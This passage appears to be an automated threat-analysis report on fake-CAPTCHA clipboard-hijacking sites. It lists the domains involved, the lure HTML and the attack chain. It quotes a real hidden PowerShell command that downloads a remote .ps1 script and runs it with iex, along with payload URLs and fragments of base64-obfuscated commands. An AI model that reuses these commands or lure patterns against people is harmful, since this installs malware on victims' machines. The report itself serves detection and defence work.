'timeslide', 'url': '?view\\x3dtimeslide'}, 'isMobile': false, 'title': 'staplebrokenmetal', 'description': '', 'url': 'https://staplebrokenmetaliyro.blogspot.com/', 'type': 'feed', 
'isSingleItem': false, 'isMultipleItems': true, 'isError': false, 'isPage': false, 'isPost': false, 'isHomepage': true, 'isArchive': false, 'isLabelSearch': false}}, {'name': 'widgets', 'data': [{'title': 'Search This Blog', 'type': 'BlogSearch', 'sectionId': 'search_top', 'id': 'BlogSearch1'}, {'title': 'staplebrokenmetal (Header)', 'type': 'Header', 'sectionId': 'header', 'id': 'Header1'}, {'title': 'Blog Posts', 'type': 'Blog', 'sectionId': 'page_body', 'id': 'Blog1', 'posts': [], 'headerByline': {'regionName': 'header1', 'items': [{'name': 'share', 'label': ''}, {'name': 'timestamp', 'label': ''}]}, 'footerBylines': [{'regionName': 'footer1', 'items': [{'name': 'comments', 'label': 'comments'}, {'name': 'icons', 'label': ''}]}, {'regionName': 'footer2', 'items': [{'name': 'labels', 'label': ''}]}, {'regionName': 'footer3', 'items': [{'name': 'location', 'label': 'Location:'}]}], 'allBylineItems': [{'name': 'share', 'label': ''}, {'name': 'timestamp', 'label': ''}, {'name': 'comments', 'label': 'comments'}, {'name': 'icons', 'label': ''}, {'name': 'labels', 'label': ''}, {'name': 'location', 'label': 'Location:'}]}, {'title': '', 'type': 'PopularPosts', 'sectionId': 'page_body', 'id': 'PopularPosts1', 'posts': []}, {'type': 'Attribution', 'sectionId': 'footer', 'id': 'Attribution1'}, {'title': 'About Me', 'type': 'Profile', 'sectionId': 'sidebar_top', 'id': 'Profile1'}, {'title': '', 'type': 'ReportAbuse', 'sectionId': 'sidebar_bottom', 'id': 'ReportAbuse1'}]}]);\n_WidgetManager._RegisterWidget('_BlogSearchView', new _WidgetInfo('BlogSearch1', 'search_top', document.getElementById('BlogSearch1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header', document.getElementById('Header1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'page_body', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'navMessage': 'No posts.', 'lightboxEnabled': true, 
'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/349593359-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/3681588378-lightbox_bundle.css'}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_PopularPostsView', new _WidgetInfo('PopularPosts1', 'page_body', document.getElementById('PopularPosts1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_AttributionView', new _WidgetInfo('Attribution1', 'footer', document.getElementById('Attribution1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_ProfileView', new _WidgetInfo('Profile1', 'sidebar_top', document.getElementById('Profile1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_ReportAbuseView', new _WidgetInfo('ReportAbuse1', 'sidebar_bottom', document.getElementById('ReportAbuse1'), {}, 'displayModeFull'));\n</script>\n</body>\n</html>", "ThreatLevel": "High" }
Technical Analysis
ClickGrab Threat Analysis Report - 2025-04-27
Most Common External Domains
- www.google.com: 26 occurrences
- use.fontawesome.com: 17 occurrences
- staplebrokenmetaliyro.blogspot.com: 15 occurrences
- cdnjs.cloudflare.com: 14 occurrences
- www.blogger.com: 13 occurrences
- www.webgo.de: 10 occurrences
- www.w3.org: 6 occurrences
- t.me: 5 occurrences
- browser.certif-update.website: 4 occurrences
- www.blogblog.com: 2 occurrences
Common Pattern Analysis
reCAPTCHA imagery (17 occurrences, 1 distinct URL)
- https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (17 times)
Font resources (31 occurrences, 2 distinct URLs)
- https://use.fontawesome.com/releases/v5.0.0/css/all.css (17 times)
- https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (14 times)
CDN-hosted scripts (15 occurrences, 2 distinct URLs)
- https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (14 times)
- https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 time)
Google resources (28 occurrences, 8 distinct URLs)
- https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (17 times)
- https://www.google.com/intl/en/policies/privacy/ (3 times)
- https://www.google.com/intl/en/policies/terms/ (3 times)
- http://www.google.com/2005/gml/b (1 time)
- http://www.google.com/2005/gml/data (1 time)
- ...and 3 more distinct URLs
JavaScript Clipboard Analysis
Found clipboard manipulation code snippets in 34 places
document.execCommand copy
Found in 34 snippets (100.0% of clipboard code)
Examples:
document.execCommand("copy")
textarea manipulation
Found in 34 snippets (100.0% of clipboard code)
Fake CAPTCHA HTML Examples
Here's how the fake CAPTCHA verification appears in HTML:
Example 1:
<div class="recaptcha-box">
<h2>Verify You Are Human</h2>
<p>Please verify that you are a human to continue.</p>
<div class="container m-p">
<div id="checkbox-window" class="checkbox-window m-p block">
<div class="checkbox-container m-p">
<button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
</div>
Example 2:
<div class="recaptcha-box">
<h2>Verify You Are Human</h2>
<p>Please verify that you are a human to continue.</p>
<div class="container m-p">
<div id="checkbox-window" class="checkbox-window m-p block">
<div class="checkbox-container m-p">
<button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
</div>
Command Context Analysis
Found 20 PowerShell download context snippets
stageClipboard Function
Found 14 references to stageClipboard function
Example stageClipboard contexts:
Example 1:
...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Example 2:
...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Example 3:
...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Malicious Commands
Found 3 commandToRun declarations
Malicious commands being prepared for the clipboard:
Example 1:
Command:
powershell
Context:
= "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...
Example 2:
Command:
powershell
Context:
...idden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...
Example 3:
Command:
powershell
Context:
= "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " +...
PowerShell Parameters
Found 2 htaPath declarations
Malicious PowerShell parameters:
Example 1:
Parameters:
-w hidden -c \
Context:
...d; const htaPath = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaP
Example 2:
Parameters:
-w hidden -c \
Context:
...const htaPath = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " +...
Clipboard Attack Pattern Analysis
Based on the data analyzed, here's the complete clipboard attack pattern:
1. Initial Victim Engagement
The victim is shown a fake CAPTCHA verification UI with Google reCAPTCHA branding.
Common elements found:
- Google reCAPTCHA logo image
- Font resources from CDNs
- "I am not a robot" checkbox
Example Fake CAPTCHA HTML:
<div class="recaptcha-box">
<h2>Verify You Are Human</h2>
<p>Please verify that you are a human to continue.</p>
<div class="container m-p">
<div id="checkbox-window" class="checkbox-window m-p block">
<div class="checkbox-container m-p">
<button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
</div>...
2. Malicious Code Preparation
When the user clicks the verification checkbox:
- A 'commandToRun' variable is set with a malicious PowerShell command
- The command is typically obfuscated and often downloads second-stage payloads
- Common download destinations include:
Example Command Preparation Code:
= "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...
3. Clipboard Hijacking
The malicious command is copied to the user's clipboard:
- A temporary textarea element is created
- The command is combined with verification text like "[CHECKMARK] I am not a robot"
- document.execCommand("copy") is used to copy to clipboard
- The temporary element is removed from the DOM
4. Social Engineering Component
The user sees a success message:
- The verification UI shows success with a checkmark symbol
- The user is told they've passed verification
- The clipboard now contains the malicious command + verification text
5. Attack Objective
Final stage of the attack:
- When the user pastes the clipboard contents elsewhere (such as into a terminal)
- They see what looks like verification text
- But the PowerShell command at the start gets executed
- This downloads and runs additional malware from attacker-controlled servers
Reconstructed Attack Example
What's copied to clipboard:
powershell # [CHECKMARK] 'I am not a robot - reCAPTCHA Verification Hash: XY12Z345'
What the user sees when pasting: a verification success message
What actually happens: PowerShell executes the hidden malicious command
Conclusion
This is a sophisticated social engineering attack that tricks users into:
- Thinking they're completing a legitimate CAPTCHA
- Unknowingly copying malicious code to their clipboard
- Executing malware when they paste what they think is just verification text
Statistics
- Total sites analyzed: 29
- Sites with malicious content: 17
- Total unique domains: 18
- Total URLs extracted: 121